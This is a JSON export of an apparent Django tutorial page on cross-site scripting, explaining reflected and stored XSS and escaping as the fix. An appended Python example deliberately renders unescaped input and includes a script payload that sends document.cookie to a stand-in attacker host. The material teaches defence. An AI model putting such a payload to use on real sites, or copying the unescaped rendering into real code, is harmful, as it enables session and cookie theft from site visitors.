{"id":75960,"date":"2020-01-20T12:40:23","date_gmt":"2020-01-20T07:10:23","guid":{"rendered":"https:\/\/www.vskills.in\/certification\/tutorial\/?p=75960"},"modified":"2024-04-12T14:17:43","modified_gmt":"2024-04-12T08:47:43","slug":"cross-site-scripting-xss-2","status":"publish","type":"page","link":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","title":{"rendered":"Cross-Site Scripting (XSS)"},"content":{"rendered":"<p>Cross-site scripting (XSS) is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of &lt;script&gt; tags. Attackers often use XSS to steal cookies and session tokens, or to trick users into giving private information to the wrong person (phishing). The attack takes many forms and has almost infinite permutations, so we\u2019ll just look at a typical example. Consider this extremely simple \u201cHello, World\u201d view:<\/p>\n<pre><code>from django.shortcuts import render_to_response  # old shortcut; modern Django uses render()\n\ndef say_hello(request):\n    # user-controlled value, straight from the query string\n    name = request.GET.get('name', 'world')\n    return render_to_response(\"hello.html\", {\"name\": name})<\/code><\/pre>\n<p>This view simply reads a name from a GET parameter and passes that name to the hello.html template. We might write a template for this view as follows:<\/p>\n<pre><code>&lt;h1&gt;Hello, {{ name }}!&lt;\/h1&gt;<\/code><\/pre>\n<p>So if we request http:\/\/example.com\/hello\/?name=Jacob, the rendered page contains this:<\/p>\n<pre><code>&lt;h1&gt;Hello, Jacob!&lt;\/h1&gt;<\/code><\/pre>\n<p>But wait: what happens if we request http:\/\/example.com\/hello\/?name=&lt;i&gt;Jacob&lt;\/i&gt;? (The browser URL-encodes the angle brackets and Django decodes them again, so the view sees the raw tags.) Then we get this:<\/p>\n<pre><code>&lt;h1&gt;Hello, &lt;i&gt;Jacob&lt;\/i&gt;!&lt;\/h1&gt;<\/code><\/pre>\n<p>Of course, an attacker wouldn\u2019t use something as benign as &lt;i&gt; tags; he could include a whole set of HTML that hijacked your page with arbitrary content. 
This type of attack has been used to trick users into entering data into what looks like their bank\u2019s Web site, but is in fact an XSS-hijacked form that submits their bank account details to an attacker.<\/p>\n<p>The problem gets worse if you store this data in the database and later display it on your site (stored XSS). For example, MySpace was once found to be vulnerable to an XSS attack of this nature. A user inserted JavaScript into his profile that automatically added him as your friend when you visited his profile page; within about a day, more than a million users had run it. Now, this may sound relatively benign, but keep in mind that this attacker managed to get his code \u2014 not MySpace\u2019s \u2014 running in your browser, with your session. This violates the assumed trust that all the code on MySpace is actually written by MySpace. MySpace was extremely lucky that this malicious code didn\u2019t delete viewers\u2019 accounts, change their passwords, flood the site with spam, or do any of the other things this vulnerability allows.<\/p>\n<p><strong>The Solution<\/strong> &#8211; The solution is simple: always escape any content that might have come from a user, at the point where it is written into HTML. If we simply rewrite our template as follows:<\/p>\n<pre><code>&lt;h1&gt;Hello, {{ name|escape }}!&lt;\/h1&gt;<\/code><\/pre>\n<p>then the view renders &lt;h1&gt;Hello, &amp;lt;i&amp;gt;Jacob&amp;lt;\/i&amp;gt;!&lt;\/h1&gt; for the request above: the browser displays the literal text &lt;i&gt;Jacob&lt;\/i&gt; and runs nothing. The escape filter replaces the five characters that carry meaning in HTML (&amp;, &lt;, &gt;, \" and ') with their entity equivalents. You should always use the escape filter (or something equivalent) when displaying user-submitted content on your site.<\/p>\n<p><strong>Why Doesn\u2019t Django Just Do This for You?<\/strong> &#8211; Whether Django should escape every template variable automatically was for a long time a recurring debate on the Django developer mailing list. Automatic escaping adds hidden, implicit behaviour to what should be a straightforward operation (displaying a variable), which runs against Django\u2019s core ideals (and Python\u2019s, for that matter); but security is equally important, and it is a difficult tradeoff to evaluate.<\/p>\n<p>Django settled that tradeoff in favour of security: since Django 1.0 the template engine escapes the output of every variable by default, so in a normal template {{ name }} and {{ name|escape }} render the same thing. Escaping is switched off only where you ask for it, and those places are what to audit in a code review: the safe filter ({{ name|safe }}), values wrapped in mark_safe() in Python code, and {% autoescape off %} blocks. Each of them tells Django \u201cI have already made this safe\u201d; if that claim is wrong for data that came from a user, you have reintroduced the hole. Two caveats remain even with auto-escaping. HTML escaping is the right encoding for text in an element body or a quoted attribute, but a value placed inside a &lt;script&gt; block, an unquoted attribute or a URL needs context-specific encoding instead (Django\u2019s json_script filter covers the common case of handing data to JavaScript). And data stored in the database is still user input when it is rendered later, as the MySpace example shows. It\u2019s a good idea to check the official Django documentation for the latest details; it will always be more up to date than this page. Whatever the template engine does for you, stay in the habit of asking, at all times, \u201cWhere does this data come from?\u201d No automatic solution will protect your site from XSS attacks 100% of the time.<\/p>\n\n\n<p><a href=\"https:\/\/www.vskills.in\/certification\/tutorial\/certified-django-developer\/\" target=\"_blank\" rel=\"noreferrer noopener\">Back to Tutorial<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of &lt;script&gt; tags. 
Attackers often use XSS attacks to steal cookie and session information, or to trick users into&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"categories":[8655],"tags":[2670],"class_list":["post-75960","page","type-page","status-publish","hentry","category-django-web-development","tag-cross-site-scripting-xss"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Cross-Site Scripting (XSS) - Tutorial<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cross-Site Scripting (XSS) - Tutorial\" \/>\n<meta property=\"og:description\" content=\"Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of &lt;script&gt; tags. Attackers often use XSS attacks to steal cookie and session information, or to trick users into...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\" \/>\n<meta property=\"og:site_name\" content=\"Tutorial\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/vskills.in\/\" \/>\n<meta property=\"article:modified_time\" content=\"2024-04-12T08:47:43+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\",\"name\":\"Cross-Site Scripting (XSS) - Tutorial\",\"isPartOf\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#website\"},\"datePublished\":\"2020-01-20T07:10:23+00:00\",\"dateModified\":\"2024-04-12T08:47:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.vskills.in\/certification\/tutorial\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cross-Site Scripting (XSS)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#website\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/\",\"name\":\"Tutorial\",\"description\":\"Vskills - A initiative in elearning and 
certification\",\"publisher\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.vskills.in\/certification\/tutorial\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#organization\",\"name\":\"Vskills\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg\",\"contentUrl\":\"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg\",\"width\":73,\"height\":55,\"caption\":\"Vskills\"},\"image\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/vskills.in\/\",\"https:\/\/x.com\/vskills_in\",\"https:\/\/www.linkedin.com\/company-beta\/1371554\/\",\"https:\/\/www.youtube.com\/channel\/UCMWnscxPwRF_PqXo9B7q_Tw\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cross-Site Scripting (XSS) - Tutorial","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","og_locale":"en_US","og_type":"article","og_title":"Cross-Site Scripting (XSS) - Tutorial","og_description":"Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. 
This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of &lt;script&gt; tags. Attackers often use XSS attacks to steal cookie and session information, or to trick users into...","og_url":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","og_site_name":"Tutorial","article_publisher":"https:\/\/www.facebook.com\/vskills.in\/","article_modified_time":"2024-04-12T08:47:43+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","url":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","name":"Cross-Site Scripting (XSS) - Tutorial","isPartOf":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#website"},"datePublished":"2020-01-20T07:10:23+00:00","dateModified":"2024-04-12T08:47:43+00:00","breadcrumb":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.vskills.in\/certification\/tutorial\/"},{"@type":"ListItem","position":2,"name":"Cross-Site Scripting (XSS)"}]},{"@type":"WebSite","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#website","url":"https:\/\/www.vskills.in\/certification\/tutorial\/","name":"Tutorial","description":"Vskills - A initiative in elearning and 
certification","publisher":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.vskills.in\/certification\/tutorial\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#organization","name":"Vskills","url":"https:\/\/www.vskills.in\/certification\/tutorial\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/","url":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg","contentUrl":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg","width":73,"height":55,"caption":"Vskills"},"image":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/vskills.in\/","https:\/\/x.com\/vskills_in","https:\/\/www.linkedin.com\/company-beta\/1371554\/","https:\/\/www.youtube.com\/channel\/UCMWnscxPwRF_PqXo9B7q_Tw"]}]}},"_links":{"self":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages\/75960","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/comments?post=75960"}],"version-history":[{"count":4,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages\/75960\/revisions"
}],"predecessor-version":[{"id":83462,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages\/75960\/revisions\/83462"}],"wp:attachment":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/media?parent=75960"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/categories?post=75960"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/tags?post=75960"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
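The say_hello view and hello.html template from the page content above, reproduced as an added, runnable example; this is not code from the page or from Django itself. Django is not imported: the standard library's html.escape() stands in for the {{ name|escape }} filter (and for the auto-escaping modern Django applies by default), since both replace the same five characters, and parse_qs() stands in for request.GET. The sample requests, the attacker.invalid host and the count_tags check are constructed for the example. It renders the page's benign, italic and script payloads through both the vulnerable and the escaped template so the difference is visible on real input.

```python
"""Reflected XSS in the page's say_hello view, reproduced with the standard library.

html.escape() is a stand-in for Django's {{ name|escape }} filter (and for the
autoescaping modern Django applies by default): both replace & < > " ' with
entities. parse_qs() stands in for request.GET.
"""
import html
import re
from urllib.parse import parse_qs, quote

# Mirrors the page's hello.html; the placeholder is {{ name }} in Django syntax.
HELLO_TEMPLATE = "<h1>Hello, {name}!</h1>"


def say_hello(query_string: str, escape: bool = True) -> str:
    """Stand-in for the view: read ?name=... like request.GET.get('name', 'world')
    and render hello.html. escape=False reproduces the page's vulnerable template,
    escape=True the fixed one."""
    params = parse_qs(query_string)           # URL-decodes, so the view sees a raw '<'
    name = params.get("name", ["world"])[0]
    if escape:
        name = html.escape(name, quote=True)  # & < > " ' -> entities, as Django does
    return HELLO_TEMPLATE.format(name=name)


def count_tags(rendered: str) -> int:
    """Number of HTML tags in the output. The template contributes exactly two
    (<h1> and </h1>); anything more means user input was rendered as markup."""
    return len(re.findall(r"</?[A-Za-z][^>]*>", rendered))


def injected_markup(rendered: str) -> bool:
    """Crude test oracle (not a sanitizer): did the response gain tags it should not have?"""
    return count_tags(rendered) > 2


# Constructed sample requests: the page's two examples plus a cookie-stealing payload.
# quote() does what the browser does to the query string before sending it.
BENIGN = "name=" + quote("Jacob")
ITALIC = "name=" + quote("<i>Jacob</i>")
STEALER = "name=" + quote(
    "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"
)

if __name__ == "__main__":
    for label, qs in (("benign", BENIGN), ("italic", ITALIC), ("stealer", STEALER)):
        vuln = say_hello(qs, escape=False)
        safe = say_hello(qs, escape=True)
        print(f"{label:8} vulnerable: injected={injected_markup(vuln)}  {vuln}")
        print(f"{label:8} escaped:    injected={injected_markup(safe)}  {safe}")
```

Run it and the italic and stealer requests come back as `<i>Jacob</i>` and a live `<script>` from the vulnerable template, and as `&lt;i&gt;Jacob&lt;/i&gt;` and `&lt;script&gt;...` from the escaped one; the attacker's text is still in the page, but only as text. count_tags is a check for a test suite, not a defence: the fix is escaping at output time, and it covers element bodies and quoted attributes only, not values placed inside a script block or a URL.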